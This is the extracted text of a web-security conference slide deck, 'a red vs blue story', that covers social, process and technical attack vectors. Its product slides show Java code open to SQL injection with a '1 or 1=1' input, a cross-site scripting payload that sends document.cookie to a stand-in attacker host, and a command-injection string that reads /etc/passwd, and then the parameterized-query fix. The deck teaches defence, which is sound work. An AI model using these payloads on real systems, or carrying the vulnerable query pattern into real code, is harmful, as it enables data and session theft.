SlideShare a Scribd company logo
1 of 94
Disclaimer
Rolf Huisman
Rolf Huisman (Long ago)
The candy drum
Matter of tradition
So how do we prevent this ?
Countermeasure
Change of attack
The candy drum of information
Impact of not taking care has changed a bit
*In dutch: Algemene verordening gegevensbescherming (AVG)
Impact of not taking care has changed a bit
*In dutch: Algemene verordening gegevensbescherming (AVG)
ING Bank (2017)
~ 680 Million
Alphabet (Google)
~ 4.4 Billion (2017)
Microsoft (2017)
~ 3.6 Billion
Rabobank (2017)
~ 104 Million
Facebook (2017)
~ 1.6 Billion
Motivation for securing
Two parties in an arms race
Red Team: Become the attacker
Blue Team: Protector of assets
So where is the attack focus ?
Agenda (Attack Vectors)
People
ProcessProduct
Lets attack the weakest point first
People
ProcessProduct
People
People
People
People
People
People
People
People
People
Target
Identities
Position
Authorizations
Habits
Likes and
Dislikes
Motivations
People
People
People
Your
WebApp
People
Your
WebApp
People
Attacking the process
People
ProcessProduct
Process
Process
Target
Responsible
people
Handovers
and systems
Conditions
and
assumptions
The formal
way and real
way
Timeline
Exceptions
and
escalations
Process
Process
Process
Process
Process
Process
Process
Process
Process Spoofing
Tampering
Repudiation
Information
disclosure
Denial of
service
Elevation of
privilege
Process
Finally attacking technology
People
ProcessProduct
Product
Product
Product
Product
Product Youtube: LiveOverflow
Product Youtube: LiveOverflow
Product Youtube: LiveOverflow
Product
String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " +
request.getParameter("user_id");
try
{
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBalanceQuery);
while (rs.next())
{
page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance"));
}
} catch (SQLException e) { ... }
Product
String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " +
request.getParameter("user_id");
try
{
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBalanceQuery);
while (rs.next())
{
page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance"));
}
} catch (SQLException e) { ... }
Product
1234
String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " +
request.getParameter("user_id");
try
{
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBalanceQuery);
while (rs.next())
{
page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance"));
}
} catch (SQLException e) { ... }
Product
1234
String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " +
1234;
try
{
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBalanceQuery);
while (rs.next())
{
page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance"));
}
} catch (SQLException e) { ... }
Product
1234
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1234
Product
1234
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1234
AccountNumber Balance
1234 20.000.000,00
Product
1234
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1234
1%20or%201%2f1
Product
1234
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1234
1%20or%201%2f1
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1 or 1=1
Product
1%20or%201%2f1
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1 or 1=1
AccountNumber Balance
1 5000,12
2 16.000,56
3 30.020.212,82
4 34.232,94
… …
Product
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1 or 1=1
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234
Product
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1 or 1=1
<H1>Hi Rolf</H1>
<H1>Hi <script>window.location="http://some_attacker/cookie.cgi?steal=" +escape(document.cookie)</script> </H1>
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234
Product
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1 or 1=1
<H1>Hi Rolf</H1>
$ rm tempfile;id;cat /etc/passwd
$ rm tempfile
<H1>Hi <script>window.location="http://some_attacker/cookie.cgi?steal=" +escape(document.cookie)</script> </H1>
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234
Product
Product
Product
String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " +
request.getParameter("user_id");
String userId = request.getParameter("user_id");
String accountBalanceQuery = "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = ? ";
Product
String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts WHERE account_owner_id = " +
request.getParameter("user_id");
String userId = request.getParameter("user_id");
String accountBalanceQuery = "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = ? ";
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBalanceQuery);
PreparedStatement statement = connection.preparereStatement(accountBalanceQuery);
statement.setString (1,userId);
ResultSet rs = statement.executeQuery();
Product
Product
Product
Product
Product
Product
Product
Product
Product
Product
Product
Product
Product
Product
Product
Summary
People
ProcessProduct
Summary
People
• Make it easy to
be safe
• Security event
monitoring
• …
ProcessProduct
Summary
People
• Make it easy to
be safe
• Security event
monitoring
• …
Process
• Misuse cases
• Threat modeling
• STRIDE
• …
Product
Summary
People
• Make it easy to be
safe
• Security event
monitoring
• …
Process
• Misuse cases
• Threat modeling
• STRIDE
• …
Product
• Get Trained
• Use the correct
API’s and tools
• Have things tested
• …
Further Reading
So let us keep our candy safe !
Questions ?

More Related Content

Similar to Web security a red vs blue story

From Vision Statement to Product Backlog
From Vision Statement to Product BacklogFrom Vision Statement to Product Backlog
From Vision Statement to Product BacklogLuiz C. Parzianello
 
Forecasting strategies for food companies
Forecasting strategies for food companiesForecasting strategies for food companies
Forecasting strategies for food companiesOdete Passingham
 
How can you leverage data to improve your customer success?
How can you leverage data to improve your customer success?How can you leverage data to improve your customer success?
How can you leverage data to improve your customer success?Andrea Balducci
 
Risk Management Plan Analysis Powerpoint Presentation Slides
Risk Management Plan Analysis Powerpoint Presentation SlidesRisk Management Plan Analysis Powerpoint Presentation Slides
Risk Management Plan Analysis Powerpoint Presentation SlidesSlideTeam
 
Identity Management: Risk Across The Enterprise
Identity Management: Risk Across The EnterpriseIdentity Management: Risk Across The Enterprise
Identity Management: Risk Across The EnterprisePerficient, Inc.
 
Assessment 3 - Project Report _Template (2).docx
Assessment 3 - Project Report _Template (2).docxAssessment 3 - Project Report _Template (2).docx
Assessment 3 - Project Report _Template (2).docxLankaniPerera
 
Tpmg Manage Cust Prof Final
Tpmg Manage Cust Prof FinalTpmg Manage Cust Prof Final
Tpmg Manage Cust Prof FinalJohn Tyler
 
Betty Kayton : Building an Operating Plan and Financial Model
Betty Kayton : Building an Operating Plan and Financial ModelBetty Kayton : Building an Operating Plan and Financial Model
Betty Kayton : Building an Operating Plan and Financial ModelStas Khirman
 
Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...
Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...
Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...Microsoft
 
UXDX London - Growth = product ( design x engineering) ^ marketing
UXDX London - Growth = product ( design x engineering) ^ marketing UXDX London - Growth = product ( design x engineering) ^ marketing
UXDX London - Growth = product ( design x engineering) ^ marketing UXDXConf
 
Cloud books presentation(2)
Cloud books presentation(2)Cloud books presentation(2)
Cloud books presentation(2)Suraj Kumar
 
Startup Metrics for Pirates (Nov 2010)
Startup Metrics for Pirates (Nov 2010)Startup Metrics for Pirates (Nov 2010)
Startup Metrics for Pirates (Nov 2010)Dave McClure
 
Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall...
 Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall... Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall...
Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall...FinTech Belgium
 
Mdia p3-03-the-profit-dimension-150420
Mdia p3-03-the-profit-dimension-150420Mdia p3-03-the-profit-dimension-150420
Mdia p3-03-the-profit-dimension-150420Peter Burgess
 
Hyperion financial management: Application design for performance
Hyperion financial management: Application design for performanceHyperion financial management: Application design for performance
Hyperion financial management: Application design for performanceAlithya
 
6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...
6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...
6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...saastr
 
Prevention And Mitigation In Disaster Management PowerPoint Presentation Slides
Prevention And Mitigation In Disaster Management PowerPoint Presentation SlidesPrevention And Mitigation In Disaster Management PowerPoint Presentation Slides
Prevention And Mitigation In Disaster Management PowerPoint Presentation SlidesSlideTeam
 
Global In-House Contact Center Benchmark Report Highlights July 2017
Global In-House Contact Center Benchmark Report Highlights July 2017Global In-House Contact Center Benchmark Report Highlights July 2017
Global In-House Contact Center Benchmark Report Highlights July 2017Golden Gate BPO Solutions
 
Startup Valuation and is there a Bubble?
Startup Valuation and is there a Bubble?Startup Valuation and is there a Bubble?
Startup Valuation and is there a Bubble?i5invest
 
Protect-Biz for business advisors (e.g., CPAs)
Protect-Biz for business advisors (e.g., CPAs)Protect-Biz for business advisors (e.g., CPAs)
Protect-Biz for business advisors (e.g., CPAs)Salt Marsh Solutions, Inc.
 

Similar to Web security a red vs blue story (20)

From Vision Statement to Product Backlog
From Vision Statement to Product BacklogFrom Vision Statement to Product Backlog
From Vision Statement to Product Backlog
 
Forecasting strategies for food companies
Forecasting strategies for food companiesForecasting strategies for food companies
Forecasting strategies for food companies
 
How can you leverage data to improve your customer success?
How can you leverage data to improve your customer success?How can you leverage data to improve your customer success?
How can you leverage data to improve your customer success?
 
Risk Management Plan Analysis Powerpoint Presentation Slides
Risk Management Plan Analysis Powerpoint Presentation SlidesRisk Management Plan Analysis Powerpoint Presentation Slides
Risk Management Plan Analysis Powerpoint Presentation Slides
 
Identity Management: Risk Across The Enterprise
Identity Management: Risk Across The EnterpriseIdentity Management: Risk Across The Enterprise
Identity Management: Risk Across The Enterprise
 
Assessment 3 - Project Report _Template (2).docx
Assessment 3 - Project Report _Template (2).docxAssessment 3 - Project Report _Template (2).docx
Assessment 3 - Project Report _Template (2).docx
 
Tpmg Manage Cust Prof Final
Tpmg Manage Cust Prof FinalTpmg Manage Cust Prof Final
Tpmg Manage Cust Prof Final
 
Betty Kayton : Building an Operating Plan and Financial Model
Betty Kayton : Building an Operating Plan and Financial ModelBetty Kayton : Building an Operating Plan and Financial Model
Betty Kayton : Building an Operating Plan and Financial Model
 
Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...
Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...
Microsoft Sales Leadership konference - GRUNDFOS OPTIMERER B2B SALG MED MOBIL...
 
UXDX London - Growth = product ( design x engineering) ^ marketing
UXDX London - Growth = product ( design x engineering) ^ marketing UXDX London - Growth = product ( design x engineering) ^ marketing
UXDX London - Growth = product ( design x engineering) ^ marketing
 
Cloud books presentation(2)
Cloud books presentation(2)Cloud books presentation(2)
Cloud books presentation(2)
 
Startup Metrics for Pirates (Nov 2010)
Startup Metrics for Pirates (Nov 2010)Startup Metrics for Pirates (Nov 2010)
Startup Metrics for Pirates (Nov 2010)
 
Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall...
 Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall... Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall...
Fintech Belgium_Webinar 13: Healthy Financial / Covid-19: Home Working Chall...
 
Mdia p3-03-the-profit-dimension-150420
Mdia p3-03-the-profit-dimension-150420Mdia p3-03-the-profit-dimension-150420
Mdia p3-03-the-profit-dimension-150420
 
Hyperion financial management: Application design for performance
Hyperion financial management: Application design for performanceHyperion financial management: Application design for performance
Hyperion financial management: Application design for performance
 
6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...
6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...
6 Steps to Building the Ultimate Integrated Marketing Framework with Productb...
 
Prevention And Mitigation In Disaster Management PowerPoint Presentation Slides
Prevention And Mitigation In Disaster Management PowerPoint Presentation SlidesPrevention And Mitigation In Disaster Management PowerPoint Presentation Slides
Prevention And Mitigation In Disaster Management PowerPoint Presentation Slides
 
Global In-House Contact Center Benchmark Report Highlights July 2017
Global In-House Contact Center Benchmark Report Highlights July 2017Global In-House Contact Center Benchmark Report Highlights July 2017
Global In-House Contact Center Benchmark Report Highlights July 2017
 
Startup Valuation and is there a Bubble?
Startup Valuation and is there a Bubble?Startup Valuation and is there a Bubble?
Startup Valuation and is there a Bubble?
 
Protect-Biz for business advisors (e.g., CPAs)
Protect-Biz for business advisors (e.g., CPAs)Protect-Biz for business advisors (e.g., CPAs)
Protect-Biz for business advisors (e.g., CPAs)
 

More from Rolf Huisman

Student session Quantum Computing
Student session Quantum ComputingStudent session Quantum Computing
Student session Quantum ComputingRolf Huisman
 
Lunch session: Quantum Computing
Lunch session: Quantum ComputingLunch session: Quantum Computing
Lunch session: Quantum ComputingRolf Huisman
 
Meetup webscale architecture quantum computing (Part 2 16-10-2018)
Meetup webscale architecture quantum computing (Part 2 16-10-2018)Meetup webscale architecture quantum computing (Part 2 16-10-2018)
Meetup webscale architecture quantum computing (Part 2 16-10-2018)Rolf Huisman
 
Meetup web scale architecture quantum computing (Part 1 16-10-2018)
Meetup web scale architecture quantum computing (Part 1 16-10-2018)Meetup web scale architecture quantum computing (Part 1 16-10-2018)
Meetup web scale architecture quantum computing (Part 1 16-10-2018)Rolf Huisman
 
Programming quantum computers in Q# (Techorama NL 2018)
Programming quantum computers in Q# (Techorama NL 2018)Programming quantum computers in Q# (Techorama NL 2018)
Programming quantum computers in Q# (Techorama NL 2018)Rolf Huisman
 
[Lightning] Microsoft q# on vsts mvp lightning
[Lightning] Microsoft q# on vsts mvp lightning[Lightning] Microsoft q# on vsts mvp lightning
[Lightning] Microsoft q# on vsts mvp lightningRolf Huisman
 
Rolf huisman programming quantum computers in dot net using q#
Rolf huisman   programming quantum computers in dot net using q#Rolf huisman   programming quantum computers in dot net using q#
Rolf huisman programming quantum computers in dot net using q#Rolf Huisman
 
Experts live dtap reinvented, a risk driven approach to release pipelines
Experts live dtap reinvented, a risk driven approach to release pipelinesExperts live dtap reinvented, a risk driven approach to release pipelines
Experts live dtap reinvented, a risk driven approach to release pipelinesRolf Huisman
 
[Lightning talk] Next generation computing with fpga
[Lightning talk] Next generation computing with fpga [Lightning talk] Next generation computing with fpga
[Lightning talk] Next generation computing with fpga Rolf Huisman
 

More from Rolf Huisman (9)

Student session Quantum Computing
Student session Quantum ComputingStudent session Quantum Computing
Student session Quantum Computing
 
Lunch session: Quantum Computing
Lunch session: Quantum ComputingLunch session: Quantum Computing
Lunch session: Quantum Computing
 
Meetup webscale architecture quantum computing (Part 2 16-10-2018)
Meetup webscale architecture quantum computing (Part 2 16-10-2018)Meetup webscale architecture quantum computing (Part 2 16-10-2018)
Meetup webscale architecture quantum computing (Part 2 16-10-2018)
 
Meetup web scale architecture quantum computing (Part 1 16-10-2018)
Meetup web scale architecture quantum computing (Part 1 16-10-2018)Meetup web scale architecture quantum computing (Part 1 16-10-2018)
Meetup web scale architecture quantum computing (Part 1 16-10-2018)
 
Programming quantum computers in Q# (Techorama NL 2018)
Programming quantum computers in Q# (Techorama NL 2018)Programming quantum computers in Q# (Techorama NL 2018)
Programming quantum computers in Q# (Techorama NL 2018)
 
[Lightning] Microsoft q# on vsts mvp lightning
[Lightning] Microsoft q# on vsts mvp lightning[Lightning] Microsoft q# on vsts mvp lightning
[Lightning] Microsoft q# on vsts mvp lightning
 
Rolf huisman programming quantum computers in dot net using q#
Rolf huisman   programming quantum computers in dot net using q#Rolf huisman   programming quantum computers in dot net using q#
Rolf huisman programming quantum computers in dot net using q#
 
Experts live dtap reinvented, a risk driven approach to release pipelines
Experts live dtap reinvented, a risk driven approach to release pipelinesExperts live dtap reinvented, a risk driven approach to release pipelines
Experts live dtap reinvented, a risk driven approach to release pipelines
 
[Lightning talk] Next generation computing with fpga
[Lightning talk] Next generation computing with fpga [Lightning talk] Next generation computing with fpga
[Lightning talk] Next generation computing with fpga
 

Recently uploaded

Top 10 CodeIgniter Development Companies
Top 10 CodeIgniter Development CompaniesTop 10 CodeIgniter Development Companies
Top 10 CodeIgniter Development CompaniesTopCSSGallery
 
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...panagenda
 
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdfMuhammad Subhan
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc
 
How we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfHow we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfSrushith Repakula
 
ChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityVictorSzoltysek
 
Simplifying Mobile A11y Presentation.pptx
Simplifying Mobile A11y Presentation.pptxSimplifying Mobile A11y Presentation.pptx
Simplifying Mobile A11y Presentation.pptxMarkSteadman7
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMKumar Satyam
 
AI mind or machine power point presentation
AI mind or machine power point presentationAI mind or machine power point presentation
AI mind or machine power point presentationyogeshlabana357357
 
ERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctBrainSell Technologies
 
Design and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data ScienceDesign and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data SciencePaolo Missier
 
State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!Memoori
 
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)Samir Dash
 
Intro to Passkeys and the State of Passwordless.pptx
Intro to Passkeys and the State of Passwordless.pptxIntro to Passkeys and the State of Passwordless.pptx
Intro to Passkeys and the State of Passwordless.pptxFIDO Alliance
 
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...FIDO Alliance
 
CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)Wonjun Hwang
 
Vector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxVector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxjbellis
 
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider  Progress from Awareness to Implementation.pptxTales from a Passkey Provider  Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptxFIDO Alliance
 

Recently uploaded (20)

Top 10 CodeIgniter Development Companies
Top 10 CodeIgniter Development CompaniesTop 10 CodeIgniter Development Companies
Top 10 CodeIgniter Development Companies
 
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
 
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
 
How we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfHow we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdf
 
ChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps Productivity
 
Simplifying Mobile A11y Presentation.pptx
Simplifying Mobile A11y Presentation.pptxSimplifying Mobile A11y Presentation.pptx
Simplifying Mobile A11y Presentation.pptx
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Overview of Hyperledger Foundation
Overview of Hyperledger FoundationOverview of Hyperledger Foundation
Overview of Hyperledger Foundation
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 
AI mind or machine power point presentation
AI mind or machine power point presentationAI mind or machine power point presentation
AI mind or machine power point presentation
 
ERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage Intacct
 
Design and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data ScienceDesign and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data Science
 
State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!
 
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
 
Intro to Passkeys and the State of Passwordless.pptx
Intro to Passkeys and the State of Passwordless.pptxIntro to Passkeys and the State of Passwordless.pptx
Intro to Passkeys and the State of Passwordless.pptx
 
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
 
CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)
 
Vector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxVector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptx
 
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider  Progress from Awareness to Implementation.pptxTales from a Passkey Provider  Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
 

Web security a red vs blue story